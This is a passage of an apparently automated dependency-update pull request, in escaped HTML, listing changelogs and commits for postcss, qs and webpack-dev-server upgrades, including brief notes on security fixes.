href=\"https://github.com/catnipan\"\u003e\u003ccode\u003e@​catnipan\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed end position of rules with semicolon (by \u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed backwards compatibility for complex cases (by \u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5 “Duke Alloces”\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cp\u003ePostCSS 8.5 brought API to work better with non-CSS sources like HTML, Vue.js/Svelte sources or CSS-in-JS.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e during \u003ca href=\"https://redirect.github.com/postcss/postcss/issues/1995\"\u003ehis work\u003c/a\u003e on \u003ca href=\"https://stylelint.io\"\u003eStylelint\u003c/a\u003e added \u003ccode\u003eInput#document\u003c/code\u003e in additional to \u003ccode\u003eInput#css\u003c/code\u003e.\u003c/p\u003e\n\u003cpre lang=\"js\"\u003e\u003ccode\u003eroot.source.input.document //=\u0026gt; \u0026quot;\u0026lt;p\u0026gt;Hello\u0026lt;/p\u0026gt;\r\n                           //    \u0026lt;style\u0026gt;\r\n                           //    p {\r\n                           //      color: green;\r\n                           //    }\r\n                           //    \u0026lt;/style\u0026gt;\u0026quot;\r\nroot.source.input.css      //=\u0026gt; \u0026quot;p {\r\n                           //      color: green;\r\n                           //    }\u0026quot;\r\n\u003cp\u003e\u0026lt;/tr\u0026gt;\u0026lt;/table\u0026gt;\u003cbr /\u003e\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/postcss/postcss/blob/main/CHANGELOG.md\"\u003epostcss's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.5.10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed XSS via unescaped \u003ccode\u003e\u0026lt;/style\u0026gt;\u003c/code\u003e in non-bundler cases (by \u003ca href=\"https://github.com/TharVid\"\u003e\u003ccode\u003e@​TharVid\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up source map encoding paring in case of the error.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.8\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eProcessor#version\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.7\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImproved source map annotation cleaning performance (by CodeAnt AI).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.6\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eContainerWithChildren\u003c/code\u003e type discriminating (by \u003ca href=\"https://github.com/Goodwine\"\u003e\u003ccode\u003e@​Goodwine\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.5\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003epackage.json\u003c/code\u003e→\u003ccode\u003eexports\u003c/code\u003e compatibility with some tools (by \u003ca href=\"https://github.com/JounQin\"\u003e\u003ccode\u003e@​JounQin\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed Parcel compatibility issue (by \u003ca href=\"https://github.com/git-sumitchaudhary\"\u003e\u003ccode\u003e@​git-sumitchaudhary\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded more details to \u003ccode\u003eUnknown word\u003c/code\u003e error (by \u003ca href=\"https://github.com/hiepxanh\"\u003e\u003ccode\u003e@​hiepxanh\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eFixed types (by \u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eFixed docs (by \u003ca href=\"https://github.com/catnipan\"\u003e\u003ccode\u003e@​catnipan\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed end position of rules with semicolon (by \u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed backwards compatibility for complex cases (by \u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5 “Duke Alloces”\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003eInput#document\u003c/code\u003e for sources like CSS-in-JS or HTML (by \u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.4.49\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed custom syntax without \u003ccode\u003esource.offset\u003c/code\u003e (by \u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/33b9790263dc1562a46ce45d9532bd63e95b7986\"\u003e\u003ccode\u003e33b9790\u003c/code\u003e\u003c/a\u003e Release 8.5.10 version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/536c79e4b01e58a3a56b09c3c0cf2323f4b9a28b\"\u003e\u003ccode\u003e536c79e\u003c/code\u003e\u003c/a\u003e Escape \u0026lt;/style\u0026gt; in CSS output (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2074\"\u003e#2074\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/afa96b2a139ce625c4d27973313479c7c85f39d4\"\u003e\u003ccode\u003eafa96b2\u003c/code\u003e\u003c/a\u003e Update dependencies (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2073\"\u003e#2073\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/effe88bb87cabdc1876e02adbdd30f392f19f40d\"\u003e\u003ccode\u003eeffe88b\u003c/code\u003e\u003c/a\u003e Typo (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2072\"\u003e#2072\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/3ee79a2c4a11e41d52db50b444eebe38299495ad\"\u003e\u003ccode\u003e3ee79a2\u003c/code\u003e\u003c/a\u003e Thread model (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2071\"\u003e#2071\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/2e0683daca4dc2919211b03774f6b2d137136c01\"\u003e\u003ccode\u003e2e0683d\u003c/code\u003e\u003c/a\u003e Create incident response docs (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2070\"\u003e#2070\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/fe88ac29c06b7b218be32994cdc6ca1525bdf2c9\"\u003e\u003ccode\u003efe88ac2\u003c/code\u003e\u003c/a\u003e Release 8.5.9 version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/c551632496b87ab3f1965bfda5dc386b6c71963e\"\u003e\u003ccode\u003ec551632\u003c/code\u003e\u003c/a\u003e Avoid RegExp when we can use simple JS\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/89a6b744060eb8dee743351c785a9fbe37d4525a\"\u003e\u003ccode\u003e89a6b74\u003c/code\u003e\u003c/a\u003e Move SECURITY.txt for docs folder to keep GitHub page cleaner\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/6ceb8a46af9f9de821faee98f861bdf84617347b\"\u003e\u003ccode\u003e6ceb8a4\u003c/code\u003e\u003c/a\u003e Create SECURITY.md\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/postcss/postcss/compare/8.4.31...8.5.10\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `qs` from 6.11.2 to 6.15.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ljharb/qs/blob/main/CHANGELOG.md\"\u003eqs's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined entries in \u003ccode\u003earrayFormat: 'comma'\u003c/code\u003e + \u003ccode\u003eencodeValuesOnly\u003c/code\u003e instead of crashing in \u003ccode\u003eencoder\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: use configured \u003ccode\u003edelimiter\u003c/code\u003e after \u003ccode\u003echarsetSentinel\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/555\"\u003e#555\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: apply \u003ccode\u003eformatter\u003c/code\u003e to encoded key under \u003ccode\u003estrictNullHandling\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/554\"\u003e#554\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined filter-array entries instead of crashing in \u003ccode\u003eencoder\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/551\"\u003e#551\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: handle nested bracket groups and add regression tests (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/530\"\u003e#530\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] fix grammar (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/550\"\u003e#550\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add regression tests for keys containing percent-encoded bracket text\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: \u003ccode\u003eparameterLimit: Infinity\u003c/code\u003e with \u003ccode\u003ethrowOnLimitExceeded: true\u003c/code\u003e silently drops all parameters\u003c/li\u003e\n\u003cli\u003e[Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003eiconv-lite\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] increase coverage\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.0\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[New] \u003ccode\u003eparse\u003c/code\u003e: add \u003ccode\u003estrictMerge\u003c/code\u003e option to wrap object/primitive conflicts in an array (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/425\"\u003e#425\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/ljharb/qs/issues/122\"\u003e#122\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eduplicates\u003c/code\u003e option should not apply to bracket notation keys (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/514\"\u003e#514\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: mark overflow objects for indexed notation exceeding \u003ccode\u003earrayLimit\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/546\"\u003e#546\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003earrayLimit\u003c/code\u003e means max count, not max index, in \u003ccode\u003ecombine\u003c/code\u003e/\u003ccode\u003emerge\u003c/code\u003e/\u003ccode\u003eparseArrayValue\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: throw on \u003ccode\u003earrayLimit\u003c/code\u003e exceeded with indexed notation when \u003ccode\u003ethrowOnLimitExceeded\u003c/code\u003e is true (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/529\"\u003e#529\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: enforce \u003ccode\u003earrayLimit\u003c/code\u003e on \u003ccode\u003ecomma\u003c/code\u003e-parsed values\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: fix error message to reflect arrayLimit as max index; remove extraneous comments (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/545\"\u003e#545\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Robustness] avoid \u003ccode\u003e.push\u003c/code\u003e, use \u003ccode\u003evoid\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[readme] document that \u003ccode\u003eaddQueryPrefix\u003c/code\u003e does not add \u003ccode\u003e?\u003c/code\u003e to empty output (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/418\"\u003e#418\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] clarify \u003ccode\u003eparseArrays\u003c/code\u003e and \u003ccode\u003earrayLimit\u003c/code\u003e documentation (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/543\"\u003e#543\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] replace runkit CI badge with shields.io check-runs badge\u003c/li\u003e\n\u003cli\u003e[meta] fix changelog typo (\u003ccode\u003earrayLength\u003c/code\u003e → \u003ccode\u003earrayLimit\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003e[actions] fix rebase workflow permissions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] ensure \u003ccode\u003earrayLimit\u003c/code\u003e applies to \u003ccode\u003e[]\u003c/code\u003e notation as well\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: when a custom decoder returns \u003ccode\u003enull\u003c/code\u003e for a key, ignore that key\u003c/li\u003e\n\u003cli\u003e[Refactor] \u003ccode\u003eparse\u003c/code\u003e: extract key segment splitting helper\u003c/li\u003e\n\u003cli\u003e[meta] add threat model\u003c/li\u003e\n\u003cli\u003e[actions] add workflow permissions\u003c/li\u003e\n\u003cli\u003e[Tests] \u003ccode\u003estringify\u003c/code\u003e: increase coverage\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003eeslint\u003c/code\u003e, \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003enpmignore\u003c/code\u003e, \u003ccode\u003ees-value-fixtures\u003c/code\u003e, \u003ccode\u003efor-each\u003c/code\u003e, \u003ccode\u003eobject-inspect\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.0\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[New] \u003ccode\u003eparse\u003c/code\u003e: add \u003ccode\u003ethrowOnParameterLimitExceeded\u003c/code\u003e option (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/517\"\u003e#517\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Refactor] \u003ccode\u003eparse\u003c/code\u003e: use \u003ccode\u003eutils.combine\u003c/code\u003e more\u003c/li\u003e\n\u003cli\u003e[patch] \u003ccode\u003eparse\u003c/code\u003e: add explicit \u003ccode\u003ethrowOnLimitExceeded\u003c/code\u003e default\u003c/li\u003e\n\u003cli\u003e[actions] use shared action; re-add finishers\u003c/li\u003e\n\u003cli\u003e[meta] Fix changelog formatting bug\u003c/li\u003e\n\u003cli\u003e[Deps] update \u003ccode\u003eside-channel\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003ees-value-fixtures\u003c/code\u003e, \u003ccode\u003ehas-bigints\u003c/code\u003e, \u003ccode\u003ehas-proto\u003c/code\u003e, \u003ccode\u003ehas-symbols\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/9aca4076fe788338c67cf7e115f0be6bc58d85a8\"\u003e\u003ccode\u003e9aca407\u003c/code\u003e\u003c/a\u003e v6.15.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/5e33d33447ed0bf1ddab9abc41d27dea4687d992\"\u003e\u003ccode\u003e5e33d33\u003c/code\u003e\u003c/a\u003e [Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/21f80b33e5c8b3f7eba1034fff0da4a4a37a1d41\"\u003e\u003ccode\u003e21f80b3\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined entries in \u003ccode\u003earrayFormat: 'comma'\u003c/code\u003e + `e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/a0a81ea2071acce3eff41a040f719ac8f5c4f64c\"\u003e\u003ccode\u003ea0a81ea\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: use configured \u003ccode\u003edelimiter\u003c/code\u003e after \u003ccode\u003echarsetSentinel\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/e3062f78f5233b338ceeb8e8dfa5a07dea4b32a8\"\u003e\u003ccode\u003ee3062f7\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: apply \u003ccode\u003eformatter\u003c/code\u003e to encoded key under \u003ccode\u003estrictNullHandling\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/0c180a40adb8c6703fffc85b2ff06ca209f5c1e0\"\u003e\u003ccode\u003e0c180a4\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined filter-array entries instead of crashi...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/3a8b94aec19bd664720f6f6b1e66c4a0dfe4b656\"\u003e\u003ccode\u003e3a8b94a\u003c/code\u003e\u003c/a\u003e [Tests] add regression tests for keys containing percent-encoded bracket text\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/96755abd357c0e534dd3442a84a04d08864bfe0d\"\u003e\u003ccode\u003e96755ab\u003c/code\u003e\u003c/a\u003e [readme] fix grammar\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/a419ce5bbfcdb98a299f1a0bb47ea055baef20e6\"\u003e\u003ccode\u003ea419ce5\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: handle nested bracket groups and add regression tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/3f5e1c528c967d915096787efbffa73cf6044170\"\u003e\u003ccode\u003e3f5e1c5\u003c/code\u003e\u003c/a\u003e v6.15.1\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ljharb/qs/compare/v6.11.2...v6.15.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack-dev-server` from 3.3.1 to 5.2.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.2\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over 